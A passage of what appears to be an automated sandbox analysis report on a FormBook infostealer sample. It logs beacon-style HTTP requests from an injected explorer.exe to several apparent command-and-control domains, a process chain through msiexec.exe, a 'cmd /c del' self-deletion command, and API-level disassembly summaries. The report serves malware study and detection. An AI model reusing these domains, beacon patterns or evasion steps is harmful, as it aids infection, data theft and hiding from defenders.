2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49737	52.5.43.61	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 10:09:46.745987892 CEST	8986	OUT	GET /dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W HTTP/1.1 Host: www.cajunseafoodstcloud.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 10:09:46.909065962 CEST	8987	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://www.cajunseafoodstcloud.com/ Server: Not GWS X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; includeSubDomains X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: origin Access-Control-Allow-Origin: * Date: Thu, 22 Jul 2021 08:09:45 GMT Connection: close Content-Length: 158 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 6a 75 6e 73 65 61 66 6f 6f 64 73 74 63 6c 6f 75 64 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://www.cajunseafoodstcloud.com/">here</a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49739	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 10:09:52.028851986 CEST	8996	OUT	GET /dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W HTTP/1.1 Host: www.extinctionbrews.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 10:09:52.168380022 CEST	8997	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 22 Jul 2021 08:09:52 GMT Content-Type: text/html Content-Length: 275 ETag: "60ef679d-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49741	50.87.238.189	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 10:09:57.556418896 CEST	9008	OUT	GET /dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W HTTP/1.1 Host: www.tinsley.website Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 10:09:57.743305922 CEST	9008	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 08:09:57 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49742	217.160.0.254	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 10:10:02.959182978 CEST	9009	OUT	GET /dy8g/?9rrLUp1=XQ+IsuOG6xtA2RDWfBD5IRfVZekOdoA9gy19PVXp7eWYHk3qJ48ISdkxrcmrsJaPDNZD&sxlxj=RL30W HTTP/1.1 Host: www.surivaganza.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 10:10:03.012269020 CEST	9010	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 619 Connection: close Date: Thu, 22 Jul 2021 08:10:03 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0d 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0d 0a 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0d 0a 20 20 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 09 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 20 20 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Error 404 - Not found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="cache-control" content="no-cache" /> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;">Error 404 - Not found</h1><p style="font-size:0.8em;">Die angegebene Seite konnte nicht gefunden werden.</p> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49743	50.87.248.20	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 10:10:13.489747047 CEST	9011	OUT	GET /dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W HTTP/1.1 Host: www.matcitekids.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 10:10:13.687524080 CEST	9012	IN	HTTP/1.1 500 Internal Server Error Date: Thu, 22 Jul 2021 08:10:13 GMT Server: Apache Content-Length: 677 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6d 61 74 63 69 74 65 6b 69 64 73 2e 6d 61 74 63 69 74 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@matcitekids.matcite.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wREFu91LXZ.exe PID: 5912 Parent PID: 5556

General

Start time:	10:08:21
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\wREFu91LXZ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\wREFu91LXZ.exe'
Imagebase:	0x400000
File size:	177125 bytes
MD5 hash:	686DC98567009E47EAC88E95804B9DDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: wREFu91LXZ.exe PID: 492 Parent PID: 5912

General

Start time:	10:08:22
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\wREFu91LXZ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\wREFu91LXZ.exe'
Imagebase:	0x400000
File size:	177125 bytes
MD5 hash:	686DC98567009E47EAC88E95804B9DDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 492

General

Start time:	10:08:27
Start date:	22/07/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 5256 Parent PID: 3388

General

Start time:	10:08:47
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0x80000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6084 Parent PID: 5256

General

Start time:	10:08:52
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3728 Parent PID: 6084

General

Start time:	10:08:53
Start date:	22/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff778f00000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: wREFu91LXZ.exe PID: 5912 Parent PID: 5556 wREFu91LXZ.exeCOMMON

Executed Functions

Function 021906DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021907B4
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021907DE
ReadFile.KERNELBASE(00000000,00000000,0219026C,?,00000000), ref: 021907F5
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 02190817
FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021901AE,7FDFFF66), ref: 0219088A
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02190895
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021901AE), ref: 021908E0

Memory Dump Source

Source File: 00000001.00000002.230039094.0000000002190000.00000040.00000001.sdmp, Offset: 02190000, based on PE: false

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction ID: bb8e00bf228637f71468f91e345378d6b4c828a5f91df051d25e3eb8dc49e290
Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction Fuzzy Hash: 16619E35F40718ABCF10DFA4C884BAEB7B6AF48710F258069E915EB390EB749D41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 021910AC, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 428processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0219128A

Strings

D, xrefs: 021910E3

Memory Dump Source

Source File: 00000001.00000002.230039094.0000000002190000.00000040.00000001.sdmp, Offset: 02190000, based on PE: false

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 0a2312f53f3315fea67b32061ce7318d6d57a0d3b8744b6b05cb46b59260ae51
Instruction ID: 708066c6d55415eba24456594634a37d57f165e28a26084216edf385e35abf54
Opcode Fuzzy Hash: 0a2312f53f3315fea67b32061ce7318d6d57a0d3b8744b6b05cb46b59260ae51
Instruction Fuzzy Hash: 2B02F570E40219EFEF14DF94C985BADBBB6BF09305F214069E51AEB291D774AA81CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02190AB5, Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000,00028400,00028400,00028400), ref: 02190BE0

Memory Dump Source

Source File: 00000001.00000002.230039094.0000000002190000.00000040.00000001.sdmp, Offset: 02190000, based on PE: false

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d63e43ab688b796a2c2e8127845cd58f79959cc7e01b3f684cd532672ae6ae21
Instruction ID: c1a67e28236d0d9d23c37f67345d353825f83d08190e91b74387899f47d10c96
Opcode Fuzzy Hash: d63e43ab688b796a2c2e8127845cd58f79959cc7e01b3f684cd532672ae6ae21
Instruction Fuzzy Hash: DE41FA29E94348E9DB60DBE4F851BBDB7B5AF48B10F205407E518EE2E0E3710E91D749

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 021908EE, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.230039094.0000000002190000.00000040.00000001.sdmp, Offset: 02190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: 4b425f91cc8ea1fb59a7bd56cf01eae2cab6ce4835231e900d034cd512c33638
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: 87112932A00108EFDF10DFA9C88486DF7FDEF58654B500065E809D3300E370DE40C660

Uniqueness

Uniqueness Score: -1.00%

Function 021909DE, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.230039094.0000000002190000.00000040.00000001.sdmp, Offset: 02190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: f1bd5e5bf2978e73d5779eee605c7f450d3243efcadc059a12659cd40e9e8e0b
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: 04E0ED357A45499F8B54CBA8C841D15B3E8EB0D660B154294E825C73A0E734EE00DA90

Uniqueness

Uniqueness Score: -1.00%

Function 02190A1C, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.230039094.0000000002190000.00000040.00000001.sdmp, Offset: 02190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 9bedb3e753e5bf89a3a09f5dbbbf71482b2fd6c8163d3d4ed782a9c61dc6716d
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: 1EE08C36791560CFCB20DB19C480D66F3E9EB8C6B071A487AE84AD3B11C330FC00CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0219099F, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.230039094.0000000002190000.00000040.00000001.sdmp, Offset: 02190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wREFu91LXZ.exe PID: 492 Parent PID: 5912 wREFu91LXZ.exeCOMMON

Executed Functions

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

